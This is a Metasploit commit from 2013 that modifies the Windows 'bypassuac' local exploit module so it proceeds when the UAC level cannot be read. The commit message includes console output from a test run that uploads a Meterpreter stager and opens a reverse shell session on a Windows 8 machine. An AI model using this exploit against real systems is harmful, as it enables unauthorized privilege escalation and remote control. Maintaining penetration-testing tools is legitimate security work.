Fix UAC is not enabled, no reason to run module when UAC is enabled a…

…nd vulnerable The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is: Here is prior to the change on a fully patched Windows 8 machine: msf exploit(bypassuac) > exploit [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [-] UAC is not enabled, no reason to run module [-] Run exploit/windows/local/ask to elevate msf exploit(bypassuac) > Here's the module when running with the most recent changes that are being proposed: [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [!] Could not determine UAC level - attempting anyways... [*] Checking admin status... [+] Part of Administrators group! Continuing... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Uploaded the agent to the filesystem.... [*] Sending stage (770048 bytes) to 172.16.21.128 [*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400 meterpreter > With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.
rapid7 · Oct 5, 2013 · 0799766 · 0799766
1 parent 875e086
commit 0799766
Showing 1 changed file with 1 addition and 3 deletions.
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
@@ -81,9 +81,7 @@ def exploit
       print_good "UAC is set to Default"
       print_good "BypassUAC can bypass this setting, continuing..."
     when 0
-      print_error "UAC is not enabled, no reason to run module"
-      print_error "Run exploit/windows/local/ask to elevate"
-      return
+      print_warning "Could not determine UAC level - attempting anyways..."
     end
 
     # Check if you are an admin